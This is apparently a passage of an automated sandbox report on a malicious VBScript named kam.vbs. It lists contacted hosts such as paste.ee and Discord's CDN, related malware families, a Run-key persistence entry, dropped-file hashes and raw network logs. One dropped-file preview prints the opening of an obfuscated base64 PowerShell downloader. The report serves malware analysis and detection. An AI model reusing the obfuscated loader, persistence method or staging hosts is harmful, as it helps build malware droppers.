        https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2675899972.000001B7D74D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2320773596.0000013F96241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2312727802.0000025D0003D000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://crl.vwscript.exe, 00000000.00000003.2122141460.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123643143.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E88C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126200279.00000185E88C1000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://secure.gravatar.comwscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2125750102.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123023393.00000185E8805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2119987319.00000185E8877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2126037390.00000185E8878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121695901.00000185E8838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E8870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122141460.00000185E883D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123741995.00000185E8877000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        188.114.96.3
        paste.eeEuropean Union
        13335CLOUDFLARENETUStrue
        162.159.134.233
        cdn.discordapp.comUnited States
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1448042
        Start date and time:2024-05-27 15:20:10 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:kam.vbs
        Detection:MAL
        Classification:mal100.spre.troj.expl.evad.winVBS@11/10@3/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 3
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Found application associated with file extension: .vbs
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 2672 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 5308 because it is empty
        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        09:21:05API Interceptor83x Sleep call for process: powershell.exe modified
        15:21:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
        15:21:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbs
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        188.114.96.3Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
        • www.uqdr.cn/yfa0/
        http://y6ss1.shop/Get hashmaliciousUnknownBrowse
        • y6ss1.shop/l/gaz/videos/gaz-platform-preview.mp4
        http://newclaim-dannx-creat.promodaget.my.id/Get hashmaliciousUnknownBrowse
        • newclaim-dannx-creat.promodaget.my.id/
        http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
        • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
        SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
        • fleur-de-lis.sbs/jhgfd
        KT-L068310.exeGet hashmaliciousFormBookBrowse
        • www.barrettdigitalart.com/i319/
        http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
        • cfg3xe.pages.dev/
        http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
        • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
        G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
        • rocheholding.top/evie3/five/fre.php
        Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
        • qr-in.com/YXcuqXy
        162.159.134.233Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
        • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
        http://162.159.134.233:443Get hashmaliciousUnknownBrowse
        • 162.159.134.233:443/
        PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
        • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
        mvoElayshk.exeGet hashmaliciousAmadeyBrowse
        • cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
        xuTyOmef1g.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
        • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        cdn.discordapp.comfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
        • 162.159.134.233
        XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
        • 162.159.129.233
        file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
        • 162.159.134.233
        https://cdn.discordapp.com/attachments/1240386543366049835/1242103657005318176/Payment_Confirmation_pdf.jar?ex=664c9ead&is=664b4d2d&hm=54d3627edfa4f918ed4c901322596ec71ddb0e6ac7cbb7aadf61cb1f960538ab&Get hashmaliciousUnknownBrowse
        • 162.159.133.233
        upload.vbsGet hashmaliciousUnknownBrowse
        • 162.159.133.233
        update.vbsGet hashmaliciousUnknownBrowse
        • 162.159.134.233
        file.vbsGet hashmaliciousUnknownBrowse
        • 162.159.130.233
        windows.vbsGet hashmaliciousUnknownBrowse
        • 162.159.129.233
        http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
        • 162.159.129.233
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 162.159.130.233
        paste.eeRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        LHER0006981753.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        upload.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        update.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        file.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        windows.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        INVOICE.jsGet hashmaliciousAgentTeslaBrowse
        • 188.114.97.3
        Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
        • 188.114.96.3
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        uploaddeimagens.com.brRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        LHER0006981753.xlsGet hashmaliciousRemcosBrowse
        • 188.114.96.3
        Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
        • 188.114.97.3
        upload.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        update.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        file.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        windows.vbsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        INVOICE.jsGet hashmaliciousAgentTeslaBrowse
        • 188.114.97.3
        Receipt #761.vbsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
        • 188.114.96.3
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUSCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 104.26.13.205
        https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
        • 172.64.41.3
        https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
        • 172.64.151.101
        PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.97.3
        https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 104.26.13.205
        hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
        • 104.17.134.249
        RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
        • 23.227.38.32
        ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
        • 104.21.40.171
        RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • 104.21.84.83
        CLOUDFLARENETUSCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 104.26.13.205
        https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exeGet hashmaliciousUnknownBrowse
        • 172.64.41.3
        https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
        • 172.64.151.101
        PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.97.3
        https://web.cinepagal.orgGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 104.26.13.205
        hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
        • 104.17.134.249
        RECEIPT-CARGO 00009933CRER3S.exeGet hashmaliciousFormBookBrowse
        • 23.227.38.32
        ctm_260524_pdf.exeGet hashmaliciousFormBookBrowse
        • 104.21.40.171
        RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • 104.21.84.83
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3b5074b1b5d032e5620f69f9f700ff0eCopy#51007602.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 188.114.96.3
        • 162.159.134.233
        yk4ABozmBY.exeGet hashmaliciousRedLineBrowse
        • 188.114.96.3
        • 162.159.134.233
        Doc100057638xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 188.114.96.3
        • 162.159.134.233
        0000003448.pdf.exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        • 162.159.134.233
        Stamp invoice copy.xls.exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        • 162.159.134.233
        GestorRemesasCONFIRMIMING.exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        • 162.159.134.233
        DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        • 162.159.134.233
        NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.96.3
        • 162.159.134.233
        proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 188.114.96.3
        • 162.159.134.233
        INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        • 162.159.134.233
        37f463bf4616ecd445d4a1937da06e19PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.96.3
        2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 188.114.96.3
        justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 188.114.96.3
        Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 188.114.96.3
        Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
        • 188.114.96.3
        file.exeGet hashmaliciousVidarBrowse
        • 188.114.96.3
        TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.96.3
        Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.96.3
        WQs56g5xeC.exeGet hashmaliciousDCRatBrowse
        • 188.114.96.3
        c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
        • 188.114.96.3
        No context
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:Unicode text, UTF-8 text, with CRLF line terminators
        Category:dropped
        Size (bytes):204074
        Entropy (8bit):5.16860231694857
        Encrypted:false
        SSDEEP:3072:A5yO1lQ014Cet1ns3wflGsZcfwMQA5PGzb8h9:A591lF1UflGsZcfb
        MD5:85CBF9B1A0E3D8FDA14A86535E0692D9
        SHA1:695EAA69C8766E01720DEC322064EE968812F264
        SHA-256:AD4AC01243A9775D26945CF742A06ACB03F34056FEE9576D646FF65617BF94F5
        SHA-512:0EECAD4E71E37B7D387938388D30589D7AE737885EB14F83813F85F9B910AC339BA8E37A9418A050AB842E0298142A5061092A261D1CF1B4C0500E6A64E84C52
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage
        Process:C:\Windows\System32\wscript.exe
        File Type:ASCII text, with very long lines (12075), with CRLF line terminators
        Category:dropped
        Size (bytes):14280
        Entropy (8bit):4.578468374310844
        Encrypted:false
        SSDEEP:384:IbnfoxVY7zZz/QMMOyVd+m67GO2/3FwDDH+N8RFiVpPgRQVN2bAxJbou:xVA1LQM4Vgh7GJ/3FwDyqiVbUM1F
        MD5:AC74BC61AC90848A26F4629199E6FC76
        SHA1:03A0331591918F44C8DC6EF8EEE16683D6F78C19
        SHA-256:5A764D78E01511AAD3F3F4618A2B891FCCDC1D994E392A65A45F98FB0B67425E
        SHA-512:6C5A3C27B2C6C09ADE79059979CE119324E6B2EE7CED47A4F1E616F7906AE49F792F7A2A9CF464077C514A705E4605182172ECD3569BE9E6817B15B2E5104272
        Malicious:false
        Reputation:low
        Preview:.. dim zootomista , repunhante , anosidade , ruiva , dissonante , Cama , dissonante1.. repunhante = " ".. anosidade = "" & ruiva & repunhante & ruiva & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & ruiva & repunhante & ruiva & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & ruiva & repunhante & ruiva & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & ruiva & repunhante & ruiva & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & ruiva & repunhante & ruiva & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & ruiva & repunhante & ruiva & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & ruiva & repunhante & ruiva & "DgTreBv
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):9434
        Entropy (8bit):4.928515784730612
        Encrypted:false
        SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
        MD5:D3594118838EF8580975DDA877E44DEB
        SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
        SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
        SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):1.1940658735648508
        Encrypted:false
        SSDEEP:3:NlllulN7rlz:NllU
        MD5:60800FE3EBA2CA09118A33A34BF00BD8
        SHA1:4DBA1472443F1B047803693393F61A2182695D2A
        SHA-256:D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
        SHA-512:AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
        Malicious:false
        Preview:@...e................................................@..........
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Entropy (8bit):3.2687771299745543
        TrID:
        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
        • MP3 audio (1001/1) 32.22%
        • Lumena CEL bitmap (63/63) 2.03%
        • Corel Photo Paint (41/41) 1.32%
        File name:kam.vbs
        File size:156'814 bytes
        MD5:c88d25dc3e72a583170ab361b79aa427
        SHA1:a540c3499b88719df6a0cdd57009abd83c76eee4
        SHA256:c8c814ebef97635b93e647552fd70186d98eff845b265710fec0bcb23775044d
        SHA512:65edf96afdc82775a25405d2afd3360dfc09d71335182efef5ac27f672a42aec151425fb5c4b4eedf9366d9850bd87b6173d7eebc69240a747a39a42f0ad46cf
        SSDEEP:1536:DFHd99COb6xCEcgu1aJK6yrl+hpW0/5J5S7Ycn6g0BXbUZlu9gISsRD:hHdk9JK6v/nc6g0BXc8
        TLSH:94E37C12A3EA0108B1F22A5D5E7291744E27BF969979C23C15BC284E0FF3D449DE5BB3
        File Content Preview:..'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'./././././././././././././././././././././././././././././././././././
        Icon Hash:68d69b8f86ab9a86
        TimestampSource PortDest PortSource IPDest IP
        May 27, 2024 15:21:03.291687965 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:03.291717052 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:03.291795015 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:03.305063963 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:03.305084944 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:03.789561033 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:03.789648056 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:04.078263044 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:04.078299046 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.078839064 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.078893900 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:04.081837893 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:04.122504950 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338171959 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338210106 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338264942 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338313103 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338336945 CEST49710443192.168.2.6188.114.96.3
        May 27, 2024 15:21:04.338346958 CEST44349710188.114.96.3192.168.2.6
        May 27, 2024 15:21:04.338356018 CEST49710443192.168.2.6188.114.96.3
